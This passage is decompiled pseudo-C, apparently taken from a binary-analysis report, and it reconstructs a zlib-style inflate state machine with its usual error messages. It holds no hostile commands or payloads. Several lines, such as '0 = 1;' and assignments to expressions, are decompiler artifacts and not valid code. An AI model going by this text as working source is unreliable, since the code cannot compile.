										__eflags = _v12;
										if(_v12 == 0) {
											goto L326;
										}
										_v8 =  *_v8 & 0x000000ff;
										_v12 = _v12 - 1;
										__ecx = __edi;
										__eax = ( *_v8 & 0x000000ff) << __cl;
										__ebx = __ebx + __eax;
										_v8 =  &(_v8[1]);
										__edi = __edi + 8;
										__eflags = __edi;
									}
									__eax = __ebx;
									__eax = __ebx & 0x00000001;
									__ebx = __ebx >> 1;
									__esi[1] = __eax;
									__ebx = __ebx & 0x00000003;
									__edi = __edi - 1;
									__eax = __ebx & 0x00000003;
									__eflags = __eax;
									if(__eax == 0) {
										 *__esi = 0xd;
										L149:
										__ebx = __ebx >> 2;
										__edi = __edi - 1;
										__edi = __edi - 1;
										goto L317;
									}
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										__eflags = _a8 - 6;
										__esi[0x13] = 0x451f10;
										__esi[0x15] = 9;
										__esi[0x14] = 0x452710;
										__esi[0x16] = 5;
										 *__esi = 0x13;
										if(_a8 != 6) {
											goto L149;
										}
										__ebx = __ebx >> 2;
										__edi = __edi - 1;
										__edi = __edi - 1;
										goto L326;
									}
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										 *__esi = 0x10;
									} else {
										__eax = __eax - 1;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = _a4;
											 *(__eax + 0x18) = "invalid block type";
											 *__esi = 0x1d;
										}
									}
									goto L149;
								}
								__ecx = __edi;
								__ecx = __edi & 0x00000007;
								__ebx = __ebx >> __cl;
								__edi = __edi - __ecx;
								 *__esi = 0x1a;
								goto L317;
							case 0xd:
								__ecx = __edi;
								__ecx = __edi & 0x00000007;
								__ebx = __ebx >> __cl;
								__edi = __edi - __ecx;
								while(1) {
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										break;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									}
									_v8 =  *_v8 & 0x000000ff;
									_v12 = _v12 - 1;
									__ecx = __edi;
									__eax = ( *_v8 & 0x000000ff) << __cl;
									__ebx = __ebx + __eax;
									_v8 =  &(_v8[1]);
									__edi = __edi + 8;
									__eflags = __edi;
								}
								__ecx = __ebx;
								__eax = __ebx;
								__ecx =  !__ebx;
								__eax = __ebx & 0x0000ffff;
								__ecx =  !__ebx >> 0x10;
								__eflags = __eax - __ecx;
								if(__eax == __ecx) {
									__ebx = 0;
									__edi = 0;
									__eflags = _a8 - 6;
									__esi[0x10] = __eax;
									 *__esi = 0xe;
									if(_a8 == 6) {
										goto L326;
									}
									goto L157;
								}
								__eax = _a4;
								 *(__eax + 0x18) = "invalid stored block lengths";
								goto L316;
							case 0xe:
								L157:
								 *__esi = 0xf;
								goto L158;
							case 0xf:
								L158:
								__eax = __esi[0x10];
								_v16 = __eax;
								__eflags = __eax;
								if(__eax == 0) {
									goto L241;
								}
								__eax = _v12;
								__eflags = _v16 - __eax;
								if(_v16 > __eax) {
									_v16 = __eax;
								}
								__eax = _v20;
								__eflags = _v16 - __eax;
								if(_v16 > __eax) {
									_v16 = __eax;
								}
								__eflags = _v16;
								if(_v16 == 0) {
									goto L326;
								} else {
									__eax = L00433F90(_v28, _v8, _v16);
									__eax = _v16;
									_v12 = _v12 - __eax;
									_v8 =  &(_v8[__eax]);
									_v20 = _v20 - __eax;
									_v28 =  &(_v28[__eax]);
									__esi[0x10] = __esi[0x10] - __eax;
									goto L317;
								}
							case 0x10:
								while(1) {
									__eflags = __edi - 0xe;
									if(__edi >= 0xe) {
										break;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									}
									_v8 =  *_v8 & 0x000000ff;
									_v12 = _v12 - 1;
									__ecx = __edi;
									__eax = ( *_v8 & 0x000000ff) << __cl;
									__ebx = __ebx + __eax;
									_v8 =  &(_v8[1]);
									__edi = __edi + 8;
									__eflags = __edi;
								}
								__ebx = __ebx & 0x0000001f;
								__eax = (__ebx & 0x0000001f) + 0x101;
								__esi[0x18] = (__ebx & 0x0000001f) + 0x101;
								__ebx = __ebx >> 5;
								__ebx = __ebx & 0x0000001f;
								__eax = (__ebx & 0x0000001f) + 1;
								__ebx = __ebx >> 5;
								__esi[0x19] = __eax;
								__ebx = __ebx & 0x0000000f;
								__eax = (__ebx & 0x0000000f) + 4;
								__ebx = __ebx >> 4;
								__edi = __edi - 0xe;
								__eflags = __esi[0x18] - 0x11e;
								__esi[0x17] = __eax;
								if(__esi[0x18] > 0x11e) {
									L171:
									__eax = _a4;
									 *(__eax + 0x18) = "too many length or distance symbols";
									goto L316;
								}
								__eflags = __esi[0x19] - 0x1e;
								if(__esi[0x19] > 0x1e) {
									goto L171;
								}
								__esi[0x1a] = __esi[0x1a] & 0x00000000;
								 *__esi = 0x11;
								goto L176;
							case 0x11:
								while(1) {
									L176:
									__eax = __esi[0x1a];
									__eflags = __eax - __esi[0x17];
									if(__eax < __esi[0x17]) {
										goto L174;
									} else {
										break;
									}
									while(1) {
										L174:
										__eflags = __edi - 3;
										if(__edi >= 3) {
											break;
										}
										__eflags = _v12;
										if(_v12 == 0) {
											goto L326;
										}
										_v8 =  *_v8 & 0x000000ff;
										_v12 = _v12 - 1;
										__ecx = __edi;
										__eax = ( *_v8 & 0x000000ff) << __cl;
										__ebx = __ebx + __eax;
										_v8 =  &(_v8[1]);
										__edi = __edi + 8;
										__eflags = __edi;
									}
									__ecx = __esi[0x1a];
									__ecx =  *(0x452790 + __esi[0x1a] * 2) & 0x0000ffff;
									__ebx = __ebx & 0x00000007;
									 *((short*)(__esi + 0x70 + __ecx * 2)) = __ax;
									__esi[0x1a] = __esi[0x1a] + 1;
									__ebx = __ebx >> 3;
									__edi = __edi - 3;
									__eflags = __edi;
								}
								while(1) {
									__eflags = __esi[0x1a] - 0x13;
									if(__esi[0x1a] >= 0x13) {
										break;
									}
									__esi[0x1a] =  *(0x452790 + __esi[0x1a] * 2) & 0x0000ffff;
									__ecx = 0;
									 *((short*)(__esi + 0x70 + ( *(0x452790 + __esi[0x1a] * 2) & 0x0000ffff) * 2)) = __cx;
									_t365 =  &(__esi[0x1a]);
									 *_t365 = __esi[0x1a] + 1;
									__eflags =  *_t365;
								}
								__eax =  &(__esi[0x14c]);
								__ecx =  &(__esi[0x1b]);
								__esi[0x1b] = __eax;
								__esi[0x13] = __eax;
								__edx =  &(__esi[0xbc]);
								__eax =  &(__esi[0x15]);
								__esi[0x15] = 7;
								__eax =  &(__esi[0x1c]);
								__eax = L0042EBA8(0,  &(__esi[0x1c]), 0x13,  &(__esi[0x1b]),  &(__esi[0x1c]),  &(__esi[0xbc]));
								_v40 = __eax;
								__eflags = __eax;
								if(__eax == 0) {
									__esi[0x1a] = __esi[0x1a] & 0x00000000;
									 *__esi = 0x12;
									goto L213;
								}
								__eax = _a4;
								 *(__eax + 0x18) = "invalid code lengths set";
								goto L316;
							case 0x12:
								while(1) {
									L213:
									__eax = __esi[0x19];
									__eax = __esi[0x19] + __esi[0x18];
									__eflags = __esi[0x1a] - __eax;
									if(__esi[0x1a] < __eax) {
										goto L185;
									} else {
										break;
									}
									while(1) {
										L185:
										__ecx = __esi[0x15];
										0 = 1;
										__eax = 1 << __cl;
										__ecx = __esi[0x13];
										(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & __ebx;
										__eax =  *(__esi[0x13] + ((1 << __cl) - 0x00000001 & __ebx) * 4);
										1 = 1 >> 8;
										__ecx = __cl & 0x000000ff;
										_v44 = 1;
										__eflags = __ecx - __edi;
										if(__ecx <= __edi) {
											break;
										}
										__eflags = _v12;
										if(_v12 == 0) {
											goto L326;
										}
										_v8 =  *_v8 & 0x000000ff;
										_v12 = _v12 - 1;
										__ecx = __edi;
										__eax = ( *_v8 & 0x000000ff) << __cl;
										__ebx = __ebx + (( *_v8 & 0x000000ff) << __cl);
										_v8 =  &(_v8[1]);
										__edi = __edi + 8;
										__eflags = __edi;
									}
									1 = 1 >> 0x10;
									__eflags = __dx - 0x10;
									if(__eflags >= 0) {
										if(__eflags != 0) {
											__eflags = _v42 - 0x11;
											__edx = __ah & 0x000000ff;
											if(_v42 != 0x11) {
												while(1) {
													__eax = __edx + 7;
													__eflags = __edi - __eax;
													if(__edi >= __eax) {
														break;
													}
													__eflags = _v12;
													if(_v12 == 0) {
														goto L326;
													}
													_v8 =  *_v8 & 0x000000ff;
													_v12 = _v12 - 1;
													__ecx = __edi;
													__eax = ( *_v8 & 0x000000ff) << __cl;
													__ebx = __ebx + (( *_v8 & 0x000000ff) << __cl);
													_v8 =  &(_v8[1]);
													__edi = __edi + 8;
													__eflags = __edi;
												}
												__ecx = __edx;
												__ebx = __ebx >> __cl;
												_push(0xfffffff9);
												__ebx = __ebx & 0x0000007f;
												__eax = (__ebx & 0x0000007f) + 0xb;
												__ebx = __ebx >> 7;
												__eflags = __ebx;
												L205:
												_v36 = _v36 & 0x00000000;
												_pop(__ecx);
												__edi = __edi + __ecx;
												__eflags = __edi;
												L206:
												__edx = __esi[0x19];
												__ecx = __esi[0x1a];
												__edx = __esi[0x19] + __esi[0x18];
												__ecx = __esi[0x1a] + __eax;
												__eflags = __ecx - __esi[0x19] + __esi[0x18];
												if(__ecx <= __esi[0x19] + __esi[0x18]) {
													while(1) {
														__eflags = __eax;
														if(__eax == 0) {
															goto L213;
														}
														__ecx = __esi[0x1a];
														__dx = _v36;
														__eax = __eax - 1;
														 *((short*)(__esi + 0x70 + __ecx * 2)) = __dx;
														_t437 =  &(__esi[0x1a]);
														 *_t437 = __esi[0x1a] + 1;
														__eflags =  *_t437;
													}
													continue;
												}
												__eax = _a4;
												 *(__eax + 0x18) = "invalid bit length repeat";
												 *__esi = 0x1d;
												L208:
												__eflags =  *__esi - 0x1d;
												if( *__esi == 0x1d) {
													goto L317;
												}
												__eflags = __esi[0x9c];
												if(__esi[0x9c] != 0) {
													__eax =  &(__esi[0x14c]);
													__ecx =  &(__esi[0x1b]);
													__esi[0x1b] = __eax;
													__esi[0x13] = __eax;
													__edx =  &(__esi[0xbc]);
													__eax =  &(__esi[0x15]);
													__esi[0x15] = 9;
													__eax =  &(__esi[0x1c]);
													__eax = L0042EBA8(1,  &(__esi[0x1c]), __esi[0x18],  &(__esi[0x1b]),  &(__esi[0x1c]),  &(__esi[0xbc]));
													_v40 = __eax;
													__eflags = __eax;
													if(__eax == 0) {
														__ecx =  &(__esi[0x1b]);
														__eax =  *__ecx;
														__esi[0x14] =  *__ecx;
														__edx =  &(__esi[0xbc]);
														__eax =  &(__esi[0x16]);
														__esi[0x16] = 6;
														__esi[0x18] = __esi + 0x70 + __esi[0x18] * 2;
														__eax = L0042EBA8(2, __esi + 0x70 + __esi[0x18] * 2, __esi[0x19], __ecx, __esi + 0x70 + __esi[0x18] * 2,  &(__esi[0xbc]));
														_v40 = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															__eflags = _a8 - 6;
															 *__esi = 0x13;
															if(_a8 == 6) {
																goto L326;
															}
															goto L221;
														}
														__eax = _a4;
														 *(__eax + 0x18) = "invalid distances set";
														goto L316;
													}
													__eax = _a4;
													 *(__eax + 0x18) = "invalid literal/lengths set";
													goto L316;
												}
												__eax = _a4;
												 *(__eax + 0x18) = "invalid code -- missing end-of-block";
												goto L316;
											}
											while(1) {
												__eax = __edx + 3;
												__eflags = __edi - __eax;
												if(__edi >= __eax) {
													break;
												}
												__eflags = _v12;
												if(_v12 == 0) {
													goto L326;
												}
												_v8 =  *_v8 & 0x000000ff;
												_v12 = _v12 - 1;
												__ecx = __edi;
												__eax = ( *_v8 & 0x000000ff) << __cl;
												__ebx = __ebx + (( *_v8 & 0x000000ff) << __cl);
												_v8 =  &(_v8[1]);
												__edi = __edi + 8;
												__eflags = __edi;
											}
											__ecx = __edx;
											__ebx = __ebx >> __cl;
											_push(0xfffffffd);
											__ebx = __ebx & 0x00000007;
											__eax = (__ebx & 0x00000007) + 3;
											__ebx = __ebx >> 3;
											goto L205;
										}
										__eax = __eax >> 8;
										__ecx = __cl & 0x000000ff;
										while(1) {
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__eflags = __edi - __ecx;
											if(__edi >= __ecx) {
												break;
											}
											__eflags = _v12;
											if(_v12 == 0) {
												goto L326;
											}
											__ecx = _v8;
											__edx =  *_v8 & 0x000000ff;
											_v12 = _v12 - 1;
											__ecx = __edi;
											__edx = ( *_v8 & 0x000000ff) << __cl;
											__ecx = __ah & 0x000000ff;
											__ebx = __ebx + (( *_v8 & 0x000000ff) << __cl);
											_v8 =  &(_v8[1]);
											__edi = __edi + 8;
											__eflags = __edi;
										}
										__ecx = __ah & 0x000000ff;
										__eax = __esi[0x1a];
										__ebx = __ebx >> __cl;
										__edi = __edi - __ecx;
										__eflags = __eax;
										if(__eax == 0) {
											__eax = _a4;
											 *(__eax + 0x18) = "invalid bit length repeat";
											goto L316;
										}
										_v36 = __eax;
										__ebx = __ebx & 0x00000003;
										__eax = (__ebx & 0x00000003) + 3;
										__ebx = __ebx >> 2;
										__edi = __edi - 1;
										__edi = __edi - 1;
										goto L206;
									}
									__eax = __eax >> 8;
									__ecx = __al & 0x000000ff;
									__eax = __esi[0x1a];
									__ebx = __ebx >> __cl;
									__edi = __edi - __ecx;
									 *((short*)(__esi + 0x70 + __esi[0x1a] * 2)) = __dx;
									__esi[0x1a] = __esi[0x1a] + 1;
								}
								goto L208;
							case 0x13:
								L221:
								 *__esi = 0x14;
								goto L222;
							case 0x14:
								L222:
								__eflags = _v12 - 6;
								if(_v12 < 6) {
									L226:
									__ecx = __esi[0x15];
									__esi[0x6f1] = __esi[0x6f1] & 0x00000000;
									__eax = __esi[0x13];
									0 = 1;
									1 << __cl = (1 << __cl) - 1;
									__edx = (1 << __cl) - 0x00000001 & __ebx;
									__eax =  *(__esi[0x13] + ((1 << __cl) - 0x00000001 & __ebx) * 4);
									while(1) {
										__eax = __eax >> 8;
										__ecx = __cl & 0x000000ff;
										__eflags = __ecx - __edi;
										if(__ecx <= __edi) {
											break;
										}
										__eflags = _v12;
										if(_v12 == 0) {
											goto L326;
										}
										_v8 =  *_v8 & 0x000000ff;
										_v12 = _v12 - 1;
										__ecx = __edi;
										__eax = ( *_v8 & 0x000000ff) << __cl;
										__ecx = __esi[0x15];
										__edi = __edi + 8;
										__ebx = __ebx + (( *_v8 & 0x000000ff) << __cl);
										_v8 =  &(_v8[1]);
										0 = 1;
										__eax = 1 << __cl;
										__ecx = __esi[0x13];
										(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & __ebx;
										__eflags = 1;
										__eax =  *(__esi[0x13] + ((1 << __cl) - 0x00000001 & __ebx) * 4);
									}
									__eflags = __al;
									if(__al == 0) {
										L237:
										__eax = __eax >> 8;
										__ecx = __cl & 0x000000ff;
										__esi[0x6f1] = __esi[0x6f1] + __ecx;
										__ebx = __ebx >> __cl;
										__edi = __edi - __ecx;
										__ecx = __eax;
										__ecx = __eax >> 0x10;
										__esi[0x10] = __ecx;
										__eflags = __al;
										if(__al != 0) {
											__eflags = __al & 0x00000020;
											if((__al & 0x00000020) == 0) {
												__eflags = __al & 0x00000040;
												if((__al & 0x00000040) == 0) {
													__eax = __al & 0x000000ff;
													__eax = __al & 0xf;
													__eflags = __eax;
													__esi[0x12] = __eax;
													 *__esi = 0x15;
													goto L245;
												}
												__eax = _a4;
												 *(__eax + 0x18) = "invalid literal/length code";
												goto L316;
											}
											_t540 =  &(__esi[0x6f1]);
											 *_t540 = __esi[0x6f1] | 0xffffffff;
											__eflags =  *_t540;
											L241:
											 *__esi = 0xb;
											goto L317;
										}
										 *__esi = 0x19;
										goto L317;
									}
									__eflags = __al & 0x000000f0;
									if((__al & 0x000000f0) != 0) {
										goto L237;
									}
									_v16 = __eax;
									_v16 = _v16 >> 8;
									__edx = _v16 & 0x000000ff;
									_v44 = __edx;
									__al & 0x000000ff = (__al & 0x000000ff) + __edx;
									0 = 1;
									__edx = 1 << __cl;
									__ecx = _v44;
									_v36 = __eax;
									__eax = __eax >> 0x10;
									(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & __ebx;
									__edx = ((1 << __cl) - 0x00000001 & __ebx) >> __cl;
									__edx = (((1 << __cl) - 0x00000001 & __ebx) >> __cl) + __eax;
									__eax = __esi[0x13];
									__eax =  *(__esi[0x13] + __edx * 4);
									__edx = _v16 & 0x000000ff;
									while(1) {
										__eax = __eax >> 8;
										__ecx = __cl & 0x000000ff;
										__ecx = (__cl & 0x000000ff) + __edx;
										__eflags = __ecx - __edi;
										if(__ecx <= __edi) {
											break;
										}
										__eflags = _v12;
										if(_v12 == 0) {
											goto L326;
										}
										_v8 =  *_v8 & 0x000000ff;
										__edx = _v35 & 0x000000ff;
										_v12 = _v12 - 1;
										__ecx = __edi;
										__eax = ( *_v8 & 0x000000ff) << __cl;
										__ecx = _v36 & 0x000000ff;
										__ebx = __ebx + (( *_v8 & 0x000000ff) << __cl);
										_v8 =  &(_v8[1]);
										__eax = 0;
										__ecx = (_v36 & 0x000000ff) + __edx;
										1 = 1 << __cl;
										__edi = __edi + 8;
										__ecx = __edx;
										(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & __ebx;
										__eax = ((1 << __cl) - 0x00000001 & __ebx) >> __cl;
										__ecx = _v34 & 0x0000ffff;
										__eax = (((1 << __cl) - 0x00000001 & __ebx) >> __cl) + (_v34 & 0x0000ffff);
										__eflags = 1;
										__ecx = __esi[0x13];
										__eax =  *(__esi[0x13] + ((((1 << __cl) - 0x00000001 & __ebx) >> __cl) + (_v34 & 0x0000ffff)) * 4);
									}
									__ecx = _v35 & 0x000000ff;
									__ebx = __ebx >> __cl;
									__edi = __edi - __ecx;
									__eflags = __edi;
									__esi[0x6f1] = __ecx;
									goto L237;
								}
								__eflags = _v20 - 0x102;
								if(_v20 < 0x102) {
									goto L226;
								}
								__eax = _a4;
								__ecx = _v28;
								 *(__eax + 0xc) = _v28;
								__ecx = _v20;
								 *(__eax + 0x10) = _v20;
								__ecx = _v8;
								 *__eax = _v8;
								__ecx = _v12;
								 *(__eax + 4) = _v12;
								__esi[0xe] = __ebx;
								__esi[0xf] = __edi;
								__eax = E0042E7C2(__eax, _v32);
								__eflags =  *__esi - 0xb;
								__eax = _a4;
								__ebx = __esi[0xe];
								__edi = __esi[0xf];
								_pop(__ecx);
								_pop(__ecx);
								__ecx =  *(__eax + 0xc);
								_v28 =  *(__eax + 0xc);
								__ecx =  *(__eax + 0x10);
								_v20 =  *(__eax + 0x10);
								__ecx =  *__eax;
								__eax =  *(__eax + 4);
								_v8 = __ecx;
								_v12 = __eax;
								if( *__esi == 0xb) {
									__esi[0x6f1] = __esi[0x6f1] | 0xffffffff;
								}
								goto L317;
							case 0x15:
								L245:
								__eax = __esi[0x12];
								__eflags = __eax;
								if(__eax == 0) {
									L250:
									__eax = __esi[0x10];
									__esi[0x6f2] = __esi[0x10];
									 *__esi = 0x16;
									goto L251;
								}
								__eflags = __edi - __eax;
								if(__edi >= __eax) {
									L249:
									0 = 1;
									__ecx = __eax;
									__edx = 1 << __cl;
									__edi = __edi - __eax;
									(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & __ebx;
									__esi[0x10] = __esi[0x10] + ((1 << __cl) - 0x00000001 & __ebx);
									__ebx = __ebx >> __cl;
									_t557 =  &(__esi[0x6f1]);
									 *_t557 = __esi[0x6f1] + __eax;
									__eflags =  *_t557;
									goto L250;
								} else {
									goto L247;
								}
								while(1) {
									L247:
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									}
									__ecx = _v8;
									__edx =  *_v8 & 0x000000ff;
									_v12 = _v12 - 1;
									__ecx = __edi;
									__edx = ( *_v8 & 0x000000ff) << __cl;
									__edi = __edi + 8;
									__ebx = __ebx + (( *_v8 & 0x000000ff) << __cl);
									_v8 =  &(_v8[1]);
									__eflags = __edi - __esi[0x12];
									if(__edi < __esi[0x12]) {
										continue;
									}
									goto L249;
								}
								goto L326;
							case 0x16:
								L251:
								__ecx = __esi[0x16];
								__eax = __esi[0x14];
								0 = 1;
								1 << __cl = (1 << __cl) - 1;
								__edx = (1 << __cl) - 0x00000001 & __ebx;
								__eax =  *(__esi[0x14] + ((1 << __cl) - 0x00000001 & __ebx) * 4);
								while(1) {
									__eax = __eax >> 8;
									__ecx = __cl & 0x000000ff;
									__eflags = __ecx - __edi;
									if(__ecx <= __edi) {
										break;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									}
									_v8 =  *_v8 & 0x000000ff;
									_v12 = _v12 - 1;
									__ecx = __edi;
									__eax = ( *_v8 & 0x000000ff) << __cl;
									__ecx = __esi[0x16];
									__edi = __edi + 8;
									__ebx = __ebx + (( *_v8 & 0x000000ff) << __cl);
									_v8 =  &(_v8[1]);
									0 = 1;
									__eax = 1 << __cl;
									__ecx = __esi[0x14];
									(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & __ebx;
									__eflags = 1;
									__eax =  *(__esi[0x14] + ((1 << __cl) - 0x00000001 & __ebx) * 4);
								}
								__eflags = __al & 0x000000f0;
								if((__al & 0x000000f0) != 0) {
									L261:
									__eax = __eax >> 8;
									__ecx = __cl & 0x000000ff;
									__esi[0x6f1] = __esi[0x6f1] + __ecx;
									__ebx = __ebx >> __cl;
									__edi = __edi - __ecx;
									__eflags = __al & 0x00000040;
									if((__al & 0x00000040) == 0) {
										__ecx = __eax;
										__eax = __al & 0x000000ff;
										__ecx = __ecx >> 0x10;
										__eax = __al & 0xf;
										__eflags = __eax;
										__esi[0x11] = __ecx;
										__esi[0x12] = __eax;
										 *__esi = 0x17;
										goto L264;
									}
									__eax = _a4;
									 *(__eax + 0x18) = "invalid distance code";
									goto L316;
								}
								_v16 = __eax;
								_v16 = _v16 >> 8;
								__edx = _v16 & 0x000000ff;
								_v44 = __edx;
								__al & 0x000000ff = (__al & 0x000000ff) + __edx;
								0 = 1;
								__edx = 1 << __cl;
								__ecx = _v44;
								_v36 = __eax;
								__eax = __eax >> 0x10;
								(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & __ebx;
								__edx = ((1 << __cl) - 0x00000001 & __ebx) >> __cl;
								__edx = (((1 << __cl) - 0x00000001 & __ebx) >> __cl) + __eax;
								__eax = __esi[0x14];
								__eax =  *(__esi[0x14] + __edx * 4);
								__edx = _v16 & 0x000000ff;
								while(1) {
									__eax = __eax >> 8;
									__ecx = __cl & 0x000000ff;
									__ecx = (__cl & 0x000000ff) + __edx;
									__eflags = __ecx - __edi;
									if(__ecx <= __edi) {
										break;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									}
									_v8 =  *_v8 & 0x000000ff;
									__edx = _v35 & 0x000000ff;
									_v12 = _v12 - 1;
									__ecx = __edi;
									__eax = ( *_v8 & 0x000000ff) << __cl;
									__ecx = _v36 & 0x000000ff;
									__ebx = __ebx + (( *_v8 & 0x000000ff) << __cl);
									_v8 =  &(_v8[1]);
									__eax = 0;
									__ecx = (_v36 & 0x000000ff) + __edx;
									1 = 1 << __cl;
									__edi = __edi + 8;
									__ecx = __edx;
									(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & __ebx;
									__eax = ((1 << __cl) - 0x00000001 & __ebx) >> __cl;
									__ecx = _v34 & 0x0000ffff;
									__eax = (((1 << __cl) - 0x00000001 & __ebx) >> __cl) + (_v34 & 0x0000ffff);
									__eflags = 1;
									__ecx = __esi[0x14];
									__eax =  *(__esi[0x14] + ((((1 << __cl) - 0x00000001 & __ebx) >> __cl) + (_v34 & 0x0000ffff)) * 4);
								}
								__ecx = _v35 & 0x000000ff;
								__ebx = __ebx >> __cl;
								__edi = __edi - __ecx;
								_t601 =  &(__esi[0x6f1]);
								 *_t601 = __esi[0x6f1] + __ecx;
								__eflags =  *_t601;
								goto L261;
							case 0x17:
								L264:
								__eax = __esi[0x12];
								__eflags = __eax;
								if(__eax == 0) {
									L269:
									 *__esi = 0x18;
									goto L270;
								}
								__eflags = __edi - __eax;
								if(__edi >= __eax) {
									L268:
									0 = 1;
									__ecx = __eax;
									__edx = 1 << __cl;
									__edi = __edi - __eax;
									(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & __ebx;
									__esi[0x11] = __esi[0x11] + ((1 << __cl) - 0x00000001 & __ebx);
									__ebx = __ebx >> __cl;
									_t621 =  &(__esi[0x6f1]);
									 *_t621 = __esi[0x6f1] + __eax;
									__eflags =  *_t621;
									goto L269;
								} else {
									goto L266;
								}
								while(1) {
									L266:
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									}
									__ecx = _v8;
									__edx =  *_v8 & 0x000000ff;
									_v12 = _v12 - 1;
									__ecx = __edi;
									__edx = ( *_v8 & 0x000000ff) << __cl;
									__edi = __edi + 8;
									__ebx = __ebx + (( *_v8 & 0x000000ff) << __cl);
									_v8 =  &(_v8[1]);
									__eflags = __edi - __esi[0x12];
									if(__edi < __esi[0x12]) {
										continue;
									}
									goto L268;
								}
								goto L326;
							case 0x18:
								L270:
								__eflags = _v20;
								if(_v20 == 0) {
									goto L326;
								}
								__eax = _v32;
								__eax = _v32 - _v20;
								__ecx = __esi[0x11];
								__eflags = __ecx - __eax;
								if(__ecx <= __eax) {
									__eax = _v28;
									__eax = _v28 - __ecx;
									__eflags = __eax;
									__ecx = __esi[0x10];
									_v44 = __ecx;
									L281:
									_v16 = __ecx;
									L282:
									__eflags = __ecx - _v20;
									if(__ecx > _v20) {
										__ecx = _v20;
										_v16 = __ecx;
									}
									__edx = _v44;
									_v20 = _v20 - __ecx;
									__edx = _v44 - __ecx;
									__eflags = __edx;
									__esi[0x10] = __edx;
									do {
										__edx = _v28;
										__cl =  *__eax;
										_v28 =  &(_v28[1]);
										__eax = __eax + 1;
										_t652 =  &_v16;
										 *_t652 = _v16 - 1;
										__eflags =  *_t652;
										 *_v28 = __cl;
									} while ( *_t652 != 0);
									__eflags = __esi[0x10];
									if(__esi[0x10] != 0) {
										goto L317;
									}
									goto L290;
								}
								__ecx = __ecx - __eax;
								_v16 = __ecx;
								__eflags = __ecx - __esi[0xb];
								if(__ecx <= __esi[0xb]) {
									L275:
									__edx = __esi[0xc];
									__eax = __esi[0xd];
									__eflags = __ecx - __edx;
									if(__ecx <= __edx) {
										__eax = __eax - __ecx;
										__eax = __eax + __edx;
										__eflags = __eax;
									} else {
										__eax = __eax + __esi[0xa];
										__ecx = __ecx - __edx;
										_v16 = __ecx;
										__eax = __eax - __ecx;
									}
									__edx = __esi[0x10];
									_v44 = __edx;
									__eflags = __ecx - __edx;
									if(__ecx <= __edx) {
										goto L282;
									} else {
										__ecx = __edx;
										goto L281;
									}
								}
								__eflags = __esi[0x6f0];
								if(__esi[0x6f0] == 0) {
									goto L275;
								}
								__eax = _a4;
								 *(__eax + 0x18) = "invalid distance too far back";
								goto L316;
							case 0x19:
								__eflags = _v20;
								if(_v20 == 0) {
									goto L326;
								}
								__ecx = _v28;
								__al = __esi[0x10];
								_v28 =  &(_v28[1]);
								_t660 =  &_v20;
								 *_t660 = _v20 - 1;
								__eflags =  *_t660;
								 *__ecx = __al;
								L290:
								 *__esi = 0x14;
								goto L317;
							case 0x1a:
								__eflags = __esi[2];
								if (__esi[2] == 0) goto L307;
								__eflags = __eax & 0xeb000000;
							case 0x1b:
								__eflags = __esi[2];
								if(__esi[2] == 0) {
									L323:
									 *__esi = 0x1c;
									goto L324;
								}
								__eflags = __esi[4];
								if(__esi[4] == 0) {
									goto L323;
								}
								while(1) {
									__eflags = __edi - 0x20;
									if(__edi >= 0x20) {
										break;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L326;
									}
									_v8 =  *_v8 & 0x000000ff;
									_v12 = _v12 - 1;
									__ecx = __edi;
									__eax = ( *_v8 & 0x000000ff) << __cl;
									__ebx = __ebx + __eax;
									_v8 =  &(_v8[1]);
									__edi = __edi + 8;
									__eflags = __edi;
								}
								__eflags = __ebx - __esi[7];
								if(__ebx == __esi[7]) {
									__ebx = 0;
									__edi = 0;
									__eflags = 0;
									goto L323;
								}
								__eax = _a4;
								 *(__eax + 0x18) = "incorrect length check";
								L316:
								 *_t834 = 0x1d;
								goto L317;
							case 0x1c:
								L324:
								_v40 = 1;
								goto L326;
							case 0x1d:
								_v40 = 0xfffffffd;
								L326:
								_t765 = _a4;
								_t765[3] = _v28;
								_t765[4] = _v20;
								 *_t765 = _v8;
								_t806 = _v12;
								_t765[1] = _v12;
								__eflags = _t834[0xa];
								_t834[0xe] = _t794;
								_t834[0xf] = _t829;
								if(_t834[0xa] != 0) {
									L331:
									_t728 =  &_v32; // 0x415461
									_t767 = E0042B426( *_t728, _t806, _a4);
									__eflags = _t767;
									if(_t767 == 0) {
										L334:
										_t831 = _a4;
										_t769 = _v48 -  *((intOrPtr*)(_t831 + 4));
										_t733 =  &_v32; // 0x415461
										_t796 =  *_t733 -  *((intOrPtr*)(_t831 + 0x10));
										 *((intOrPtr*)(_t831 + 8)) =  *((intOrPtr*)(_t831 + 8)) + _t769;
										 *((intOrPtr*)(_t831 + 0x14)) =  *((intOrPtr*)(_t831 + 0x14)) + _t796;
										_t834[7] = _t834[7] + _t796;
										__eflags = _t834[2];
										_v48 = _t769;
										if(_t834[2] != 0) {
											__eflags = _t796;
											if(_t796 != 0) {
												_push(_t796);
												__eflags = _t834[4];
												_push( *((intOrPtr*)(_t831 + 0xc)) - _t796);
												_push(_t834[6]);
												if(_t834[4] == 0) {
													_t772 = E0042CA6C();
												} else {
													_t772 = E0042CA52(_t806);
												}
												_t834[6] = _t772;
												 *(_t831 + 0x30) = _t772;
												_t769 = _v48;
											}
										}
										_t807 =  *_t834;
										__eflags = _t807 - 0xb;
										if(_t807 != 0xb) {
											_t750 =  &_a4;
											 *_t750 = _a4 & 0x00000000;
											__eflags =  *_t750;
										} else {
